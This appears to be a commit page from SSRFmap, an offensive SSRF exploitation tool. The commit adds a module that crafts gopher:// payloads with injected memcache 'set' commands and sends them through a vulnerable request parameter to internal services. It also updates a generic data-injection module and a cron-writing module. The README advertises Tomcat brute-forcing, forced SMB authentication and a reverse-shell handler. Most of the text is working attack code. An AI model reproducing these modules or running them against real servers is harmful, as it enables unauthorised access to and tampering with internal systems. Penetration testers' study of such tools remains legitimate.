MODULE - Memcache store data
parent
d57cbcce98
commit
da86cab442
38
README.md
38
README.md
|
@ -39,6 +39,7 @@ The following modules are already implemented and can be used with the `-m` argu
|
||||||
| `smbhash` | Force an SMB authentication via a UNC Path |
|
| `smbhash` | Force an SMB authentication via a UNC Path |
|
||||||
| `tomcat` | Bruteforce attack against Tomcat Manager |
|
| `tomcat` | Bruteforce attack against Tomcat Manager |
|
||||||
| `custom` | Send custom data to a listening service, e.g: netcat |
|
| `custom` | Send custom data to a listening service, e.g: netcat |
|
||||||
|
| `memcache` | Store data inside the memcache instance |
|
||||||
|
|
||||||
|
|
||||||
## Install and Manual
|
## Install and Manual
|
||||||
|
@ -46,26 +47,27 @@ The following modules are already implemented and can be used with the `-m` argu
|
||||||
Basic install from the Github repository.
|
Basic install from the Github repository.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/swisskyrepo/SSRFmap
|
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||||
cd SSRFmap/
|
$ cd SSRFmap/
|
||||||
pip3 install -r requirements.txt
|
$ pip3 install -r requirements.txt
|
||||||
python3 ssrfmap.py
|
$ python3 ssrfmap.py
|
||||||
|
|
||||||
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
|
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
|
||||||
[--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
|
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
|
||||||
[--ssl [SSL]] [--level [LEVEL]]
|
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
|
||||||
|
|
||||||
optional arguments:
|
optional arguments:
|
||||||
-h, --help show this help message and exit
|
-h, --help show this help message and exit
|
||||||
-r REQFILE SSRF Request file
|
-r REQFILE SSRF Request file
|
||||||
-p PARAM SSRF Parameter to target
|
-p PARAM SSRF Parameter to target
|
||||||
-m MODULES SSRF Modules to enable
|
-m MODULES SSRF Modules to enable
|
||||||
-l HANDLER Start an handler for a reverse shell
|
-l HANDLER Start an handler for a reverse shell
|
||||||
--lhost LHOST LHOST reverse shell
|
-v [VERBOSE] Enable verbosity
|
||||||
--lport LPORT LPORT reverse shell
|
--lhost LHOST LHOST reverse shell
|
||||||
--uagent USERAGENT User Agent to use
|
--lport LPORT LPORT reverse shell
|
||||||
--ssl [SSL] Use HTTPS without verification
|
--uagent USERAGENT User Agent to use
|
||||||
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
--ssl [SSL] Use HTTPS without verification
|
||||||
|
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Examples
|
## Examples
|
||||||
|
|
|
@ -14,10 +14,17 @@ class exploit():
|
||||||
|
|
||||||
def __init__(self, requester, args):
|
def __init__(self, requester, args):
|
||||||
logging.info("Module '{}' launched !".format(name))
|
logging.info("Module '{}' launched !".format(name))
|
||||||
gen_host = gen_ip_list("127.0.0.1", args.level)
|
gen_hosts = gen_ip_list("127.0.0.1", args.level)
|
||||||
SERVICE_PORT = input("Service Port: ")
|
self.SERVICE_PORT = input("Service Port: ")
|
||||||
SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
||||||
|
|
||||||
for SERVICE_IP in gen_host:
|
for gen_host in gen_hosts:
|
||||||
payload = wrapper_gopher(SERVICE_DATA, SERVICE_IP, SERVICE_PORT)
|
payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
|
||||||
r = requester.do_request(args.param, payload)
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Generated payload : {}".format(payload))
|
||||||
|
|
||||||
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Module '{}' ended !".format(name))
|
|
@ -0,0 +1,34 @@
|
||||||
|
from core.utils import *
|
||||||
|
import urllib.parse
|
||||||
|
import logging
|
||||||
|
|
||||||
|
name = "memcache"
|
||||||
|
description = "Store data inside the memcache instance"
|
||||||
|
author = "Swissky"
|
||||||
|
documentation = []
|
||||||
|
|
||||||
|
class exploit():
|
||||||
|
SERVICE_IP = "127.0.0.1"
|
||||||
|
SERVICE_PORT = "11211"
|
||||||
|
SERVICE_DATA = "\r\n"
|
||||||
|
|
||||||
|
def __init__(self, requester, args):
|
||||||
|
logging.info("Module '{}' launched !".format(name))
|
||||||
|
gen_host = gen_ip_list("127.0.0.1", args.level)
|
||||||
|
payload = input("Data to store: ")
|
||||||
|
|
||||||
|
self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload))
|
||||||
|
self.SERVICE_DATA += '{}\r\n'.format(payload)
|
||||||
|
self.SERVICE_DATA += 'quit\r\n'
|
||||||
|
self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
|
||||||
|
|
||||||
|
for SERVICE_IP in gen_host:
|
||||||
|
payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Generated payload : {}".format(payload))
|
||||||
|
|
||||||
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Module '{}' ended !".format(name))
|
|
@ -45,9 +45,15 @@ class exploit():
|
||||||
payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
|
payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
|
||||||
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
|
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Generated payload : {}".format(payload))
|
||||||
|
|
||||||
# Send the payload
|
# Send the payload
|
||||||
r = requester.do_request(args.param, payload)
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Module '{}' ended !".format(name))
|
||||||
|
|
||||||
"""
|
"""
|
||||||
TODO:
|
TODO:
|
||||||
This exploit only works if you have control over a cron file.
|
This exploit only works if you have control over a cron file.
|
||||||
|
|
|
@ -29,6 +29,7 @@ def parse_args():
|
||||||
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
|
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
|
||||||
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
|
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
|
||||||
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
|
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
|
||||||
|
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
||||||
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
||||||
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
||||||
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
||||||
|
|
Loading…
Reference in New Issue